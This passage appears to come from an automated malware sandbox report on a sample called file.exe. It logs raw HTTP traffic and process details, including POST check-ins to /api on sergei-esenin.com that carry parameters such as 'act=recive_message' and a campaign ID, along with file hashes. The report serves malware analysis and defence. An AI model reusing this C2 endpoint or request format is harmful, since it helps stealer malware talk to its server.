                                                                                                                        2024-10-13 19:04:12 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                        Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.749700104.21.53.84434836C:\Users\user\Desktop\file.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-13 19:04:13 UTC264OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 8
                                                                                                                        Host: sergei-esenin.com
                                                                                                                        2024-10-13 19:04:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                        Data Ascii: act=life
                                                                                                                        2024-10-13 19:04:13 UTC555INHTTP/1.1 200 OK
                                                                                                                        Date: Sun, 13 Oct 2024 19:04:13 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2BZY192G0BbjMAkKrvT7Kcj%2FwWvbXxHghT9NtBXHpEKKO6ivNcugHC4rg%2BfD3OzD7cQIYU6yCCR8Et1x0joJhhfOuRxW9aejQ6JfD2%2BnKwVzpWvzcCfcQVQdbqCJZZME0aaakg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8d219819df6cde99-EWR
                                                                                                                        2024-10-13 19:04:13 UTC814INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                        Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                        2024-10-13 19:04:13 UTC1369INData Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27
                                                                                                                        Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
                                                                                                                        2024-10-13 19:04:13 UTC1369INData Raw: 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69
                                                                                                                        Data Ascii: agement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <i
                                                                                                                        2024-10-13 19:04:13 UTC889INData Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62
                                                                                                                        Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
                                                                                                                        2024-10-13 19:04:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.749701104.21.53.84434836C:\Users\user\Desktop\file.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-13 19:04:13 UTC354OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cookie: __cf_mw_byp=gMs.8iLbDkUvWsm4DLZbAmUFo5QbmHUkuLow6nV_yck-1728846253-0.0.1.1-/api
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 52
                                                                                                                        Host: sergei-esenin.com
                                                                                                                        2024-10-13 19:04:13 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                                        2024-10-13 19:04:14 UTC831INHTTP/1.1 200 OK
                                                                                                                        Date: Sun, 13 Oct 2024 19:04:14 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=i9qqigfenb6g78e4mvdbv94981; expires=Thu, 06 Feb 2025 12:50:52 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFKiFZ1jNSd9D1Q%2FJbIB%2FEIJ%2FdoiCOWsVFBSrTO8Z5wtkuC4bDRSh4wgwEMFIbAC9hGvx4%2Fu1EdGdL3xhQi%2BScclki8QeG799LBMaCaoWGgGCCu70xMHPWgQCAMp2GuNlogrCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8d21981e0f5a43c1-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        2024-10-13 19:04:14 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                        Data Ascii: aerror #D12
                                                                                                                        2024-10-13 19:04:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:1
                                                                                                                        Start time:15:04:08
                                                                                                                        Start date:13/10/2024
                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                        Imagebase:0x880000
                                                                                                                        File size:1'845'248 bytes
                                                                                                                        MD5 hash:395A5C7FA6131D1A2CE4689CE9202399
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:12
                                                                                                                        Start time:15:04:13
                                                                                                                        Start date:13/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1112
                                                                                                                        Imagebase:0x9b0000
                                                                                                                        File size:483'680 bytes
                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        No disassembly